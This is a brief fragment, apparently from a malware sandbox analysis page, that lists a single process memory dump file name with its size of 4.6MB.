                                                          • memory/6936-1454-0x0000000000D10000-0x00000000011B1000-memory.dmp

                                                            Filesize

                                                            4.6MB